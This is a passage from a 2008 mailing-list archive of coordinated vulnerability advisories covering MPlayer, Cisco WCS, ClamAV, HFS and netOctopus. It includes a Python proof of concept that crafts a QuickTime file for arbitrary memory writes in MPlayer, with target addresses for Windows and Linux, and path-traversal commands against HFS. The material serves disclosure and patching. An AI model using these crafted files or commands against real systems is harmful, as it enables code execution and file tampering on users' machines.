*Vulnerable Packages*

. MPlayer 1.0 rc2.
. Older versions are probably affected too, but they were not checked.


*Non-vulnerable Packages*

. MPlayer SVN HEAD after r25922 (Tue Jan 29 22:14:00 2008 UTC).
. MPlayer 1.0rc2 + security patches.


*Vendor Information, Solutions and Workarounds*

A fix for this problem was committed to SVN on the MPlayer project [2].
Users of affected MPlayer versions should download a patch [3] for
MPlayer 1.0rc2 or update to the latest version if they are using SVN.


*Credits*

This vulnerability was discovered and researched by Felipe Manzano and
Anibal Sacco from Core Security Technologies.


*Technical Description / Proof of Concept Code*

First some information from Quicktime File Format Specification (may 1996):

"A QuickTime file stores the description of the media separately from
the media data. The description, or meta-data, is called the movie and
contains information such as the number of tracks, video compression
format, and timing information. The movie also contains an index of
where all the media data is stored. The media data is all of the actual
sample data, such as video frames and audio samples. The media data may
be stored in the same file as the QuickTime movie, in a separate file,
or in several files.

...QuickTime uses two basic structures for storing information: atoms
and QT atoms. Both atoms and QT atoms allow you to construct arbitrarily
complex hierarchical data structures. Both also allow applications to
ignore data they don't understand."

An atom field has a LTV format (Length - Tag - Value) and the sizes are
the following:

/-----------

+--------------+
| Size | (32 bits)
+--------------+
| Tag | (32 bits)
+--------------+
| Payload | (variable, which could contain other atoms inside)
+--------------+

- -----------/

The MPlayer software walks these atoms structures and parses the
'Payload' fields. The vulnerability occurs when parsing the 'stsc' atom
tag (which could be contained or not inside another atom) as we explain
below.

At 'mov_demux.c' (line 1768) an array of 'chunkmap' structures is filled
by reading data straight from file without any kind of check. Then, at
'mov_build_index()' (line 150), the 'trak->chunkmap[i].first' field is
used to index the heap array 'chunks' allowing an attacker to write the
'sdid' and 'spc' values at some memory address relative to that heap
pointer causing a memory corruption. This could be used to overwrite
function pointers or some critical data allowing an attacker to get code
execution.

Besides, it is possible to fool the parser in a way such that no memory
is allocated for the array pointed by 'trak->chunks', being initialized
to 0 (at line 1301). Doing this will remove the "relative to that heap
pointer" restriction allowing an attacker to write partially at almost
any memory address.

Why partially? Because the structure used to write is declared in this way:

/-----------

typedef struct {
unsigned int sample; // number of the first sample in the chunk
unsigned int size; // number of samples in the chunk
int desc; // for multiple codecs mode - not used
off_t pos;
} mov_chunk_t;

- -----------/

So, being 'desc' and 'size' the controlled fields it is possible to
write at memory address: 'i*sizeof(chunk_t)+4' and 'i*sizeof(chunk_t)+8'
for any 'i' value (at lines 177 and 178).

/-----------

1755 case MOV_FOURCC('s','t','s','c'): {
1756 int temp = stream_read_dword(demuxer->stream);
1757 int len = stream_read_dword(demuxer->stream);
1758 int ver = (temp << 24);
1759 int flags = (temp << 16) | (temp << 8) | temp;
1760 int i;
1761 mp_msg(MSGT_DEMUX, MSGL_V,
1762 "MOV: %*sSample->Chunk mapping table! (%d blocks)
(ver:%d,flags:%d)\n", level, "",
1763 len, ver, flags);
1764 // read data:
1765 trak->chunkmap_size = len;
1766 trak->chunkmap = calloc(len, sizeof(mov_chunkmap_t));
1767 for (i = 0; i < len; i++) {
1768 trak->chunkmap[i].first = stream_read_dword(demuxer->stream) - 1;
1769 trak->chunkmap[i].spc = stream_read_dword(demuxer->stream);
1770 trak->chunkmap[i].sdid = stream_read_dword(demuxer->stream);
1771 }
1772 break;
1773 }

150 void mov_build_index(mov_track_t* trak,int timescale){
151 int i,j,s;
152 int last=trak->chunks_size;
153 unsigned int pts=0;
154
169 mp_msg(MSGT_DEMUX, MSGL_V, "MOV track #%d: %d chunks, %d
samples\n",trak->id,trak->chunks_size,trak->samples_size);
170 mp_msg(MSGT_DEMUX, MSGL_V, "pts=%d scale=%d
time=%5.3f\n",trak->length,trak->timescale,(float)trak->length/(float)trak->timescale);
171
172 // process chunkmap:
173 i=trak->chunkmap_size;
174 while(i>0){
175 --i;
176 for(j=trak->chunkmap[i].first;j<last;j++){
177 trak->chunks[j].desc=trak->chunkmap[i].sdid;
178 trak->chunks[j].size=trak->chunkmap[i].spc;
179 }
180 last=trak->chunkmap[i].first;
181 }

- -----------/

In this way, as we show in the following PoC, it is possible to build a
file that contains specially crafted 'stsc' atoms allowing an attacker
to write any value in practically any address. With this clear and some
voodoo magic it is possible to write a scattered payload that builds a
fully functional shellcode on some other place to subsequently jump to.

The following PoC python code demonstrates the vulnerability.

/-----------

#!/bin/python

import struct
import sys

def mkatom(type,data):
if len(type) != 4:
raise "type must by of length 4!!!"
mov = ""
mov += struct.pack(">L",len(data)+8)
mov += type
mov += data
return mov

def poc(address, block_size):

what=struct.pack(">L", 0x41414141) * 2 # Writes an 8 bytes chunk
base= ((address - 8) / block_size) +1

ftyp = mkatom("ftyp","3gp4"+"\x00\x00\x02\x00"+"3gp4"+"3gp33gp23gp1")
mdat = mkatom("mdat","MALDAAAAAD!")
stsc = mkatom("stsc",struct.pack(">L",1) + \
struct.pack(">L",2) + \
struct.pack(">L",base) + \
what + \
struct.pack(">L",base+300)+what)
trak = mkatom("trak",stsc)
moov = mkatom("moov",trak)

file = ftyp + mdat + moov
return file

try:
if sys.argv[2] != "linux":
evilness = poc(0x0122e000, 24) #Windows XP SP2 Prof. ES
else:
evilness = poc(0x088aa020, 20) #Linux Gentoo

print "[+] Generating file: %s" % sys.argv[1]
file = open(sys.argv[1], "wb")
file.write(evilness)
file.close()
print "[+] Done."

except Exception, e:
print "[+] Usage: python mplayer_poc.py filename.mov windows (For
WinXP Prof SP2 ES)"
print " python mplayer_poc.py filename.mov linux (For
Linux Gentoo)"

- -----------/


*Report Timeline*

. 2008-01-18: Core Security Technologies notifies the MPlayer team of
the vulnerability.
. 2008-01-18: The MPlayer team asks Core Security Technologies for
technical description of the vulnerability.
. 2008-01-22: Technical details sent to MPlayer team by Core Security
Technologies.
. 2008-01-28: MPlayer notifies Core Security Technologies that a fix has
been produced.
. 2008-02-04: CORE-2008-0122 advisory is published.


*References*

[1] http://www.mplayerhq.hu
[2]
http://svn.mplayerhq.hu/mplayer/trunk/libmpdemux/demux_mov.c?r1=25920&r2=25922
[3] http://www.mplayerhq.hu/MPlayer/patches/demux_mov_fix_20080129.diff


*About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs/.


*About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.


*Disclaimer*

The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


*GPG/PGP Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHp2cUyNibggitWa0RAt6mAJ49+DbotNeLAGZsUT+GngtZsKrRJQCeOL0d
cHhAkwi751HR3NJSPFW7CxA=
=sS4h
-----END PGP SIGNATURE-----

]]> Mon, 04 Feb 2008 17:27:16 -0200 CORE Security Technologies Advisories http://lists.jammed.com/vulnwatch/2008/01/0011.html -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Cisco Security Advisory: Cisco Wireless Control System Tomcat mod_jk.so
Vulnerability

Advisory ID: cisco-sa-20080130-wcs

http://www.cisco.com/warp/public/707/cisco-sa-20080130-wcs.shtml

Revision 1.0

For Public Release 2008 January 30 1600 UTC (GMT)

+-----------------------------------------------------------------------

Summary
=======

Apache Tomcat is the servlet container for JavaServlet and JavaServer
Pages Web within the Cisco Wireless Control System (WCS). A
vulnerability exists in the mod_jk.so URI handler within Apache Tomcat
which, if exploited, may result in a remote code execution attack.

This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20080130-wcs.shtml.

Affected Products
=================

This section provides details on affected products.

Vulnerable Products
+------------------

Cisco WCS devices running software 3.x and 4.0.x prior to 4.0.100.0 are
affected by this vulnerability. Cisco WCS devices running software 4.1.x
and 4.2.x prior to to version 4.2.62.0 are also vulnerable.

Note: The version of WCS software installed on a particular device can
be found via the WCS HTTP management interface. Select
"Help -> About the Software" to obtain the software version.

Products Confirmed Not Vulnerable
+--------------------------------

No other Cisco products are currently known to be affected by this
vulnerability.

Details
=======

The Cisco Wireless Control System is a centralized, systems-level
platform for managing and controlling lightweight access points,
wireless LAN controllers, and Wireless Location Appliances for the
Cisco Unified Wireless Network. The Cisco Wireless Control System uses
Apache Tomcat. A vulnerability in Apache Tomcat may allow for remote
code execution attacks. The mod_jk.so URI handler does not handle long
URLs correctly. An insecure memory copy triggers an exploitable stack
overflow. This vulnerability is documented in CVE-2007-0774 and in Cisco
bug ID CSCsk18191.

Vulnerability Scoring Details
+----------------------------

Cisco has provided scores for the vulnerability in this advisory based
on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in
this Security Advisory is done in accordance with CVSS version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of the
vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding CVSS
at

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html.

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at

http://intellishield.cisco.com/security/alertmanager/cvss.

CSCsk18191 - WCS mod_jk.so Apache Tomcat vulnerability

CVSS Base Score - 10.0
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete

CVSS Temporal Score - 8.3
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed


Impact
======

Successful exploitation of the vulnerability may result in remote code
execution.

Software Versions and Fixes
===========================

Each row of the following software table (below) describes a release
train and the platforms or products for which it is intended. If a
given release train is vulnerable, then the earliest possible releases
that contain the fix are shown in the "First Fixed Release" column. A
device running a release in the given train that is earlier than the
release in a specific column (less than the First Fixed Release) is
known to be vulnerable. The release should be upgraded at least to the
indicated release or a later version (greater than or equal to the
First Fixed Release label).

+-------------------------------------------------------------+
| Affected Releases | First Fixed |
| | Releases |
|-----------------------------------------+-------------------|
| WCS for Linux and Windows 4.0.x and | 4.0.100.0 |
| earlier | |
|-----------------------------------------+-------------------|
| WCS for Linux and Windows 4.1.91.0 and | 4.2.62.0 |
| earlier | |
+-------------------------------------------------------------+

When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory, and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.

Workarounds
===========

The following workarounds can be implemented.

Transit ACLs (tACL)
+------------------

Filters that deny HTTPS packets using TCP port 443 should be deployed
throughout the network as part of a tACL policy for protection of
traffic which enters the network at ingress access points. This policy
should be configured to protect the network device where the filter is
applied and other devices behind it. Filters for HTTPS packets using
TCP port 443 should also be deployed in front of vulnerable network
devices so that traffic is only allowed from trusted clients.

Additional information about tACLs is available in "Transit Access
Control Lists: Filtering at Your Edge":

http://www.cisco.com/en/US/tech/tk648/tk361/technologies_white_paper09186a00801afc76.shtml

Additional Mitigation Techniques
+-------------------------------

Additional mitigation techniques that can be deployed on Cisco devices
within the network are available in the Cisco Applied Intelligence
companion document for this advisory:

http://www.cisco.com/warp/public/707/cisco-amb-20080130-wcs.shtml

Obtaining Fixed Software
========================

Cisco has released free software updates that address this
vulnerability. Prior to deploying software, customers should consult
their maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature
sets they have purchased. By installing, downloading, accessing
or otherwise using such software upgrades, customers agree to be
bound by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.

Do not contact psirt@private or security-alert@private for software
upgrades.

Customers with Service Contracts
+-------------------------------

Customers with contracts should obtain upgraded software through their
regular update channels. For most customers, this means that upgrades
should be obtained through the Software Center on Cisco's worldwide
website at http://www.cisco.com.

Customers using Third Party Support Organizations
+------------------------------------------------

Customers whose Cisco products are provided or maintained through prior
or existing agreements with third-party support organizations, such as
Cisco Partners, authorized resellers, or service providers should
contact that support organization for guidance and assistance with the
appropriate course of action in regards to this advisory.

The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.

Customers without Service Contracts
+----------------------------------

Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through their
point of sale should acquire upgrades by contacting the Cisco Technical
Assistance Center (TAC). TAC contacts are as follows:

* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@private

Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to a
free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.

Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.

Exploitation and Public Announcements
=====================================

The Cisco PSIRT is aware of the availability of proof-of-concept
exploits.

Status of this Notice: FINAL
============================

THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT
YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.

A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an uncontrolled
copy, and may lack important information or contain factual errors.

Distribution
============

This advisory is posted on Cisco's worldwide website at:

http://www.cisco.com/warp/public/707/cisco-sa-20080130-wcs.shtml

In addition to worldwide web posting, a text version of this notice is
clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.

* cust-security-announce@private
* first-teams@private
* bugtraq@private
* vulnwatch@private
* cisco@private
* cisco-nsp@private
* full-disclosure@private
* comp.dcom.sys.cisco@private

Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on mailing
lists or newsgroups. Users concerned about this problem are encouraged
to check the above URL for any updates.

Revision History
================

+-------------------------------------------------------------+
| Revision 1.0 | 2008-January-30 | Initial public release. |
+-------------------------------------------------------------+

Cisco Security Procedures
=========================

Complete information on reporting security vulnerabilities
in Cisco products, obtaining assistance with security
incidents, and registering to receive security information
from Cisco, is available on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding
Cisco security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt.

+-----------------------------------------------------------------------
All contents are Copyright 2006-2007 Cisco Systems, Inc. All rights
reserved.
+-----------------------------------------------------------------------

Updated: Jan 29, 2008 Document ID: 100361

+-----------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (FreeBSD)

iD8DBQFHoKf686n/Gc8U/uARAm9sAKCHo6l9iJ87Y3H/UZd96HibLCMPAACfXvk9
q2P9vDmfgI45MPGr4GRgaY0=
=Dkxv
-----END PGP SIGNATURE-----

]]> Wed, 30 Jan 2008 11:58:45 -0500 Cisco Systems Product Security Incident Response Team http://lists.jammed.com/vulnwatch/2008/02/0006.html iDefense Security Advisory 02.12.08
http://labs.idefense.com/intelligence/vulnerabilities/
Feb 12, 2008

I. BACKGROUND

Clam AntiVirus is a multi-platform GPL anti-virus toolkit. ClamAV is
often integrated into e-mail gateways and used to scan e-mail traffic
for viruses. It supports virus scanning for a wide variety of packed
Portable Executable (PE) binaries. For more information visit the
vendor's web site at the following URL.

http://www.clamav.net/

II. DESCRIPTION

Remote exploitation of an integer overflow vulnerability in Clam
AntiVirus' ClamAV, as included in various vendors' operating system
distributions, allows attackers to execute arbitrary code with the
privileges of the affected process.

The vulnerability exists within the code responsible for parsing and
scanning PE files. While iterating through all sections contained in
the PE file, several attacker controlled values are extracted from the
file. On each iteration, arithmetic operations are performed without
taking into consideration 32-bit integer wrap.

Since insufficient integer overflow checks are present, an attacker can
cause a heap overflow by causing a specially crafted Petite packed PE
binary to be scanned. This results in an exploitable memory corruption
condition.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the process using libclamav. In the case of
the clamd program, this will result in code execution with the
privileges of the clamav user. Unsuccessful exploitation results in the
clamd process crashing.

Address Space Layout Randomization (ASLR) and non-executable memory
protection technologies (such as DEP, NX, XD, PaX, etc) can help
mitigate exploitation of this type of vulnerability.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in ClamAV
0.92. Previous versions may also be affected.

V. WORKAROUND

Disabling the scanning of PE files will prevent exploitation.

If using clamscan, this can be done by running clamscan with the
'--no-pe' option.

If using clamdscan, set the 'ScanPE' option in the clamd.conf file to
'no'.

VI. VENDOR RESPONSE

The ClamAV team has addressed this vulnerability within version 0.92.1.
Additionally, the ClamAV team reports, "the vulnerable module was
remotely disabled via virus-db update on Jan 11th 2008."

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-0318 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

01/07/2008 Initial vendor notification
01/11/2008 Initial vendor response
02/12/2008 Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Silvio Cesare.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@private for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

]]> Tue, 12 Feb 2008 12:35:03 -0500 iDefense Labs http://lists.jammed.com/vulnwatch/2008/01/0008.html Syhunt: HFS (HTTP File Server) Log Arbitrary File/Directory
Manipulation and Denial-of-Service Vulnerabilities

Advisory-ID: 200801162
Discovery Date: 1.16.2008
Release Date: 1.23.2008
Affected Applications: HFS 2.2 to and including 2.3(Beta Build
#174)
Non-Affected Applications: HFS 2.1d and earlier versions
Class: Arbitrary File/Directory Manipulation, Denial of Service
Status: Patch available/Vendor informed
Vendor: Massimo Melina
Vendor URL: http://www.rejetto.com/hfs -or- hfs.sourceforge.net

The Common Vulnerabilities and Exposures (CVE) project has
assigned the following CVEs to these vulnerabilities:
* CVE-2008-0405 - Arbitrary File/Folder Creation Vulnerability
* CVE-2008-0406 - Denial of Service (DoS) Vulnerability

----------------------------------------------------------------

Overview:
HFS is a very popular open source HTTP server designed for
easily sharing files. According to information on the official
website, the HTTP File Server software has been downloaded about
2 million times.

Description:
HFS (versions 2.2 to 2.3 beta) will not check if an account name
provided during navigation exists or contains any invalid chars
before logging information about a request. This is specially
dangerous if the server has been configured to use account names
as log filenames.

In this case, a remote attacker can use this flaw to create
arbitrary files, append data to arbitrary files, create
arbitrary folders or launch a DoS attack against the server.
Technical details are included below.

----------------------------------------------------------------

Details (Replicating the issues):
1) Arbitrary File/Directory Manipulation Vulnerability
http://www.syhunt.com/advisories/hfshack.txt
See the "mkd" and "manipf" commands

Example 1 - Arbitrary Directory Creation:
If HFS is running (for e.g.) in the C:\HFS directory, you can
create the C:\Syhunt\ directory by entering:
mkd ..\Syhunt

Example 2 - Arbitrary File Creation/Manipulation:
manipf [localfilename] [remotefilename]
manipf inject.html ..\Syhunt\index.html

This example would create the file "C:\Syhunt\index.html" and
append the content of the file "inject.html" to it.

2) Denial of Service (DoS) Vulnerability
http://www.syhunt.com/advisories/hfshack.txt
"checkdos" command

* HFS will close immediately after receiving the DoS request

* This issue is related to Windows limitations with long
filenames. XP has a limit of 255 characters; Windows Vista a 260
chars limit.

----------------------------------------------------------------

Vulnerability Status:
The vendor was contacted and has immediately released HFS 2.2c
which fixes these problems. The new version can be downloaded at
www.rejetto.com/hfs/download or via the "Check for news/updates"
option in the HFS menu.

As a workaround for the affected releases, users can temporarily
disable the logging feature or remove the %user% symbol from the
log filename.

Testers of HFS 2.3 Beta should upgrade to the latest 2.3 beta
build.

HFS 2.3 Beta specifically is only affected if the option
"Accept any login for unprotected resources" is enabled. This
option, introduced in this version, is disabled by default.

----------------------------------------------------------------

Credit:
Felipe Aragon and Alec Storm
Syhunt Security Research Team, www.syhunt.com

---

Copyright © 2008 Syhunt Security

Disclaimer:
The information in this advisory is provided "as is" without
warranty of any kind. Details provided are strictly for
educational and defensive purposes.

Syhunt is not liable for any damages caused by direct or
indirect use of the information provided by this advisory.

]]> Wed, 23 Jan 2008 15:49:51 -0200 Alec Storm http://lists.jammed.com/vulnwatch/2008/02/0001.html -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs

MPlayer 1.0rc2 buffer overflow vulnerability


*Advisory Information*

Title: MPlayer 1.0rc2 buffer overflow vulnerability
Advisory ID: CORE-2007-1218
Advisory URL: http://www.coresecurity.com/?action=item&id=2103
Date published: 2008-02-04
Date of last update: 2008-02-01
Vendors contacted: MPlayer and Xine team
Release mode: Coordinated release


*Vulnerability Information*

Class: Buffer overflow
Remotely Exploitable: No
Locally Exploitable: Yes
Bugtraq ID: 27441
CVE Name: CVE-2008-0486


*Vulnerability Description*

The MPlayer package [1] is vulnerable to a buffer overflow attack, which
can be exploited by malicious remote attackers. The vulnerability is due
to MPlayer not properly sanitizing certain tags on a FLAC file before
using them to index an array on the stack. This can be exploited to
execute arbitrary commands by opening a specially crafted file.

The Xine package [2], and probably other packages based on MPlayer [3],
are vulnerable to this attack too.


*Vulnerable Packages*

. MPlayer 1.0rc2 and SVN before r25917 (Tue Jan 29 22:00:58 2008 UTC).
Older versions are probably affected too, but they were not checked.
. Xine-lib 1.1.10. Other MPlayer related projects are affected too.


*Non-vulnerable Packages*

. MPlayer SVN HEAD after r25917.
. MPlayer 1.0rc2 + security patches.


*Vendor Information, Solutions and Workarounds*

A fix for this problem was committed to SVN on the MPlayer project [4].
Users of affected MPlayer versions should download a patch [5] for
MPlayer 1.0rc2 or update to the latest version if they are using SVN.


*Credits*

This vulnerability was discovered by Damian Frizza and Alfredo Ortega,
from the Exploit Writers team of Core Security Technologies.


*Technical Description / Proof of Concept Code*

The vulnerability was found in the following code, used to parse FLAC
comments inside MPlayer:

/-----------

libmpdemux/demux_audio.c

206 case FLAC_VORBIS_COMMENT:
207 {
208 /* For a description of the format please have a look at */
209 /* http://www.xiph.org/vorbis/doc/v-comment.html */
210
211 uint32_t length, comment_list_len;
212 (1) char comments[blk_len];
213 uint8_t *ptr = comments;
214 char *comment;
215 int cn;
216 char c;
217
218 if (stream_read (s, comments, blk_len) == blk_len)
219 {
220 (2) length = AV_RL32(ptr);
221 ptr += 4 + length;
222
223 comment_list_len = AV_RL32(ptr);
224 ptr += 4;
225
226 cn = 0;
227 for (; cn < comment_list_len; cn++)
228 {
229 length = AV_RL32(ptr);
230 ptr += 4;
231
232 comment = ptr;
233 (3) c = comment[length];
234 comment[length] = 0; ...

- -----------/

We can see in (2) that the 'length' variable is being loaded from a
position on the file stream, and then used without any validation to
index the 'comment' buffer, that was allocated from the stack in (1).
This causes a stack corruption, and possibly allows code execution (e.g.
modifying the value of the 'length' variable, that is also on the stack).

Example Attack Scenario:

1) The user receives an email with an attachment called e.g.
'goodmusic.flac'.
2) The user opens the file with MPlayer or another vulnerable software.
3) This causes a stack corruption and malicious code execution on the
user computer.


*Report Timeline*

. 2007-12-18: Core Security Technologies notifies the MPlayer team of
the vulnerability (no reply received).
. 2008-01-04: A new notification of the vulnerability was sent to the
MPlayer team (no reply received).
. 2008-01-18: A new notification of the vulnerability was sent to the
MPlayer team.
. 2008-01-18: The MPlayer team asked Core Security Technologies for
technical description of the vulnerability.
. 2008-01-22: Technical details was sent to MPlayer team by Core
Security Technologies.
. 2008-01-28: MPlayer notified Core Security Technologies that a fix had
been produced.
. 2008-02-04: CORE-2007-1218 advisory was published.


*References*

[1] http://www.mplayerhq.hu
[2] http://xinehq.de/
[3] http://www.mplayerhq.hu/design7/projects.html
[4]
http://svn.mplayerhq.hu/mplayer/trunk/libmpdemux/demux_audio.c?r1=25911&r2=25917
[5] http://www.mplayerhq.hu/MPlayer/patches/demux_audio_fix_20080129.diff


*About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs/.


*About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.


*Disclaimer*

The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


*GPG/PGP Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHp2riyNibggitWa0RApD/AKCtN46G9t/7fMEutRQbUx6uVKonDwCfWYcb
g+kdvVlvzynfGW8XUUI1v7w=
=Byqy
-----END PGP SIGNATURE-----

]]> Mon, 04 Feb 2008 17:43:30 -0200 CORE Security Technologies Advisories http://lists.jammed.com/vulnwatch/2008/01/0003.html iDefense Security Advisory 01.07.08
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 07, 2008

I. BACKGROUND

Motorola netOctopus is an asset management agent. It is used to deploy
software, monitor performance, and configure client machines from a
central administrative console. More information can be found on the
vendor's site at the following URL.

http://www.netopia.com/software/products/netoctopus/

II. DESCRIPTION

Local exploitation of a privilege escalation vulnerability in Motorola
Inc.'s netOctopus could allow an attacker to execute arbitrary code in
kernel context.

The netOctopus Agent software is supposed to be installed on all client
machines. It includes a driver, nantsys.sys, that is loaded at system
boot time. This driver exposes a device interface, \\.\NantSys, that is
writable by all users.

This driver includes functionality for reading and writing arbitrary CPU
Model Specific Registers (MSRs). Changing MSR values allows tuning of
various low level CPU operations. By modifying SYSENTER_EIP_MSR, is is
possible to execute arbitrary attacker supplied code in kernel context
by executing a sysenter instruction.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code in kernel context. Unsuccessful attempts may result in a system
crash. However, due to the nature of the vulnerability exploitation is
extremely reliable.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in version
5.0.0.115 of the nantsys.sys driver as included with netOctopus version
5.1.2 build 1011. Previous versions may also be affected.

V. WORKAROUND

Remove write permissions for the Everyone group for the \\.\NantSys
device. This can be accomplished by using a tool like WinObj. This will
prevent regular users from writing to the device.

VI. VENDOR RESPONSE

To address this vulnerability, Motorola Inc. has made a script available
to remove the affected driver from the system. For more information,
consult their advisory at the following URL.

http://www.netopia.com/support/software/technotes/netoctopus/Removing_the_nantsys_Driver.pdf
http://www.netopia.com/support/software/technotes/netoctopus/removeNantsys.vbs

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-5761 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

09/07/2007 Initial vendor notification
09/07/2007 Initial vendor response
01/07/2008 Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Stephen Fewer of Harmony
Security (www.harmonysecurity.com).

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.
